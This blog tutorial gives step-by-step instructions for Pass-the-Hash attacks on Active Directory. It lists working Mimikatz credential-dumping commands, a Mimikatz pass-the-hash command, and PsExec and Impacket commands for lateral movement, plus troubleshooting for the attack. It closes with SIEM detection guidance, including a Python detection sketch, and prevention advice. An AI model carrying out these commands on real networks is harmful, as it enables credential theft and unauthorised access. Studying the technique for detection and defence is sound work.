OneWriteup

How to perform Pass The Hash Attack on Active Directory in 2025?

by FOUNDER
August 19, 2025

What is Pass The Hash Attack?

Pass the Hash is an attack technique in which an attacker steals a user's hashed password and uses that hash to authenticate as the user or to services. The technique bypasses the standard authentication steps that normally require the user's original password, allowing attackers seamless entry as though they were legitimate users.

Requirements for Pass The Hash Attack?

  1. The attacker must have some form of access to the target system, which could be through compromised credentials, phishing, or exploiting vulnerabilities.
  2. Extracted NTLM hashes.
  3. Administrative access privileges on the initial compromised system.

Tools Used In Pass The Hash Attack?

  1. Impacket: A tool written in Python used for penetration testing of network protocols.
  2. Mimikatz: A powerful open-source tool that helps to extract credentials on Windows operating systems.

How to perform Pass The Hash Attack on Active Directory?

Steps to Perform the Attack

Step 1. Dump the NTLM hash of a specific user using DCSync

First, you need to dump the hashes of user accounts from the Domain Controller (DC). Use Mimikatz for this:

lsadump::dcsync /domain:server.local /user:Rosetta.Jena

This command will retrieve the NTLM hash for the specified user.

To dump the hashes of all stored logon credentials from the current sessions on the machine, use Mimikatz:

privilege::debug
sekurlsa::logonpasswords

Step 2. Perform the Pass-the-Hash Attack

With the required hash in hand, execute the following command in Mimikatz:

privilege::debug
sekurlsa::pth /user:username_here /domain:domain.local /ntlm:hash_here

  • /user:username_here: The target username.
  • /domain:domain.local: The domain of the target account.
  • /ntlm:hash_here: The NTLM hash of the target user.

Step 3. A new command prompt will automatically open

In that terminal, run:

PsExec.exe \\10.0.0.71 cmd.exe

  • 10.0.0.71: The IP address of the victim’s machine.

OR

Step 1. Use Impacket to perform the Pass The Hash Attack.

Once you have the NTLM hash, use Impacket to authenticate to the target system:

impacket-psexec 'SERVER/username@IP_HERE' -hashes 'ntlm_hash_here'

  • SERVER: The target server or workstation.
  • username: The username for which you have the hash.
  • IP_HERE: The IP address of the target machine.
  • ntlm_hash_here: The NTLM hash obtained from the previous step.


Troubleshooting Common Errors.

Error: “Make sure that the default admin$ share is enabled.”

If you encounter this error, follow one of the solutions below:

Solution 1: Enable the admin$ share.

  1. Go to C:\Windows.
  2. Right-click and select Properties.
  3. Click on Advanced Sharing.
  4. Check the box for Share this folder.
  5. Enter the name admin$.
  6. Hit Permissions, and it is recommended to remove ‘Everyone’ and add only the users that PsExec will use for execution.

Solution 2: Ensure the victim user has local administrator privileges on their machine.

How to detect pass the hash attack using SIEM?

To detect Pass-the-Hash attacks in a SIEM:

  • Monitor authentication logs for anomalies (Event ID 4624 for successful logons, 4625 for failed logons).
  • Track NTLM authentication.
  • Identify the use of administrative tools (Event ID 4688 for process creation).
  • Analyze lateral movement patterns.
  • Check for anomalous account behavior.
  • Enable specific event alerts.
  • Monitor network traffic.
  • Leverage threat intelligence.
  • Correlate events across sources.
  • Conduct regular audits and reviews.
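As an added example (not code from the original article), the following sketch shows how the 4624 and 4688 correlations described above could be expressed as detection logic. The sample events are constructed; the field names follow the Windows Security event schema, while the five-minute window, the two-host threshold and the rule names are assumptions to tune per environment.

```python
from datetime import datetime, timedelta

# Constructed sample events; "time", "host" and "id" are this example's own keys.
EVENTS = [
    {"time": "2025-08-19T10:00:05", "host": "WS01", "id": 4624, "LogonType": 9,
     "LogonProcessName": "seclogo", "AuthenticationPackageName": "Negotiate",
     "TargetUserName": "helpdesk1", "IpAddress": "::1"},
    {"time": "2025-08-19T10:01:10", "host": "SRV02", "id": 4624, "LogonType": 3,
     "LogonProcessName": "NtLmSsp", "AuthenticationPackageName": "NTLM",
     "TargetUserName": "Rosetta.Jena", "IpAddress": "10.0.0.50"},
    {"time": "2025-08-19T10:01:12", "host": "SRV02", "id": 4688,
     "NewProcessName": "C:\\Windows\\PSEXESVC.exe"},
    {"time": "2025-08-19T10:03:00", "host": "SRV03", "id": 4624, "LogonType": 3,
     "LogonProcessName": "NtLmSsp", "AuthenticationPackageName": "NTLM",
     "TargetUserName": "Rosetta.Jena", "IpAddress": "10.0.0.50"},
    {"time": "2025-08-19T10:04:00", "host": "SRV04", "id": 4624, "LogonType": 3,
     "LogonProcessName": "Kerberos", "AuthenticationPackageName": "Kerberos",
     "TargetUserName": "alice", "IpAddress": "10.0.0.60"},
]

def ts(e):
    return datetime.fromisoformat(e["time"])

def is_ntlm_network_logon(e):
    return (e["id"] == 4624 and e.get("LogonType") == 3
            and e.get("AuthenticationPackageName") == "NTLM")

def detect(events, window=timedelta(minutes=5), min_hosts=2):
    alerts = []
    ntlm = [e for e in events if is_ntlm_network_logon(e)]
    for e in events:
        # Logon type 9 via seclogo: commonly cited trace of a sekurlsa::pth session
        if e["id"] == 4624 and e.get("LogonType") == 9 and e.get("LogonProcessName") == "seclogo":
            alerts.append(("newcredentials_seclogo", e["host"], e["TargetUserName"]))
        # PsExec service binary started shortly after an NTLM network logon on the same host
        if e["id"] == 4688 and e.get("NewProcessName", "").lower().endswith("psexesvc.exe"):
            for l in ntlm:
                if l["host"] == e["host"] and timedelta(0) <= ts(e) - ts(l) <= window:
                    alerts.append(("ntlm_logon_then_psexec", e["host"], l["TargetUserName"]))
    # Same account and source IP reaching several hosts over NTLM inside the window
    for l in ntlm:
        key = (l["TargetUserName"], l["IpAddress"])
        hosts = {o["host"] for o in ntlm
                 if (o["TargetUserName"], o["IpAddress"]) == key
                 and abs(ts(o) - ts(l)) <= window}
        alert = ("ntlm_fanout", key[0], key[1])
        if len(hosts) >= min_hosts and alert not in alerts:
            alerts.append(alert)
    return alerts
```

Legitimate NTLM network logons and RunAs /netonly sessions produce the same events, so these rules are starting points for triage and need allow-listing of known administrative sources.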

How to prevent Pass The Hash Attack?

  1. Implement MFA and prefer Kerberos over NTLM for stronger authentication.
  2. Apply the principle of least privilege and use dedicated admin workstations.
  3. Keep systems updated with patches and monitor for vulnerabilities.
  4. Enforce strong password policies and educate users on password hygiene.
  5. Limit access to critical systems and control lateral movement through segmentation.
  6. Monitor authentication logs and use Intrusion Detection Systems (IDS).
  7. Enable Windows Credential Guard and disable NTLM where feasible.
  8. Conduct regular audits of user accounts and remove unused accounts.
  9. Provide security awareness training and conduct phishing simulations.
  10. Use anti-virus solutions and regularly scan endpoints for vulnerabilities.

Conclusion

This guide provides a structured approach to performing a Pass-the-Hash attack using Mimikatz and Impacket in a Windows environment. Always ensure that you have permission to conduct such activities in your network to comply with legal and ethical standards.


Disclaimer: This blog is for educational purposes only, promoting awareness of ethical hacking and cybersecurity to help readers protect against cyber threats. All content is based on lawful experiments on our own systems. No illegal activities are endorsed. Users agree to apply the information responsibly and legally. The blog and author are not liable for any misuse. By using this blog, you agree to use all knowledge ethically and legally. [Read full disclaimer].
